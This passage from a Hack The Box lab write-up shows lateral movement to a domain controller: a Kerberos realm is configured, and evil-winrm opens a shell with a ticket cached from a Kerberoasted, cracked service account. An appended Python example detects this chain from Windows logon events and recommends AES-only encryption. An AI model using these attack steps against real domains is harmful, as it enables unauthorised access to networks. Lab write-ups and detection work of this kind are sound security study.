WinRM


The rsa_4810 account was successfully compromised via Kerberoasting, and the credential cracked from its hash has been validated by generating a TGT.

┌──(kali㉿kali)-[~/archive/htb/labs/blazorized]
└─$ echo -e '[realms]\n\n\tBLAZORIZED.HTB = {\n\t\tkdc = dc1.blazorized.htb\n\t}' | sudo tee /etc/krb5.conf
 
[realms]
 
	BLAZORIZED.HTB = {
		kdc = dc1.blazorized.htb
	}

The /etc/krb5.conf file is set up so that the BLAZORIZED.HTB realm uses dc1.blazorized.htb as its KDC.

┌──(kali㉿kali)-[~/archive/htb/labs/blazorized]
└─$ KRB5CCNAME=rsa_4810@dc1.blazorized.htb.ccache evil-winrm -i dc1.blazorized.htb -r BLAZORIZED.HTB 
 
Evil-WinRM shell v3.5
 
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\RSA_4810\Documents> whoami
blazorized\rsa_4810
*Evil-WinRM* PS C:\Users\RSA_4810\Documents> hostname
DC1
*Evil-WinRM* PS C:\Users\RSA_4810\Documents> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 10.10.11.22
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : 10.10.10.2

Lateral movement to the rsa_4810 account was made via WinRM, authenticating with the Kerberos ticket cache.
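
From the defender's side, the chain in these notes (a Kerberoasted service account that then logs on over the network via WinRM) can be looked for in the DC's Security log. The following is an added example, not part of the original notes: it correlates constructed 4769 and 4624 records, and the requesting user lowpriv, the 192.0.2.x addresses, the timestamps and the 24-hour window are all assumptions.

```python
# Added example: constructed events, not logs from the lab in these notes.
from datetime import datetime, timedelta

RC4_HMAC = "0x17"             # RC4 service tickets are the usual Kerberoasting tell
WINDOW = timedelta(hours=24)  # assumption: correlation window, tune per environment

# Constructed, simplified records using 4769/4624 field names; "lowpriv" and
# the 192.0.2.x addresses are hypothetical.
EVENTS = [
    {"time": "2024-07-01T10:00:00", "id": 4769, "TargetUserName": "lowpriv@BLAZORIZED.HTB",
     "ServiceName": "rsa_4810", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.0.2.10"},
    {"time": "2024-07-01T10:00:05", "id": 4769, "TargetUserName": "lowpriv@BLAZORIZED.HTB",
     "ServiceName": "DC1$", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:192.0.2.10"},
    {"time": "2024-07-01T11:30:00", "id": 4624, "TargetUserName": "RSA_4810", "LogonType": 3,
     "AuthenticationPackageName": "Kerberos", "IpAddress": "192.0.2.10"},
    {"time": "2024-07-01T12:00:00", "id": 4624, "TargetUserName": "svc_backup", "LogonType": 3,
     "AuthenticationPackageName": "Kerberos", "IpAddress": "192.0.2.77"},
]

def norm_ip(ip):
    """Strip the IPv4-mapped prefix that 4769 records often carry."""
    return ip.removeprefix("::ffff:")

def norm_user(name):
    """Drop any @REALM suffix and fold case so 4769 and 4624 names compare."""
    return name.split("@")[0].lower()

def find_roast_then_logon(events, window=WINDOW):
    """Flag network logons by an account whose SPN ticket was just requested with RC4 from the same host."""
    roasted = {}  # (service account, source ip) -> time of the RC4 TGS request
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        ip = norm_ip(ev["IpAddress"])
        if ev["id"] == 4769:
            svc = norm_user(ev["ServiceName"])
            rc4 = ev["TicketEncryptionType"].lower() == RC4_HMAC
            # Machine accounts and krbtgt are not crackable user-account SPNs.
            if rc4 and not svc.endswith("$") and svc != "krbtgt":
                roasted[(svc, ip)] = t
        elif ev["id"] == 4624 and ev["LogonType"] == 3:  # WinRM shows up as a network logon
            key = (norm_user(ev["TargetUserName"]), ip)
            if key in roasted and t - roasted[key] <= window:
                alerts.append({"account": key[0], "source": ip,
                               "tgs_request": roasted[key].isoformat(), "logon": ev["time"]})
    return alerts

if __name__ == "__main__":
    print(find_roast_then_logon(EVENTS))
```

Enforcing AES-only encryption types and long random passwords on SPN-bearing accounts removes the cracking step this correlation keys on.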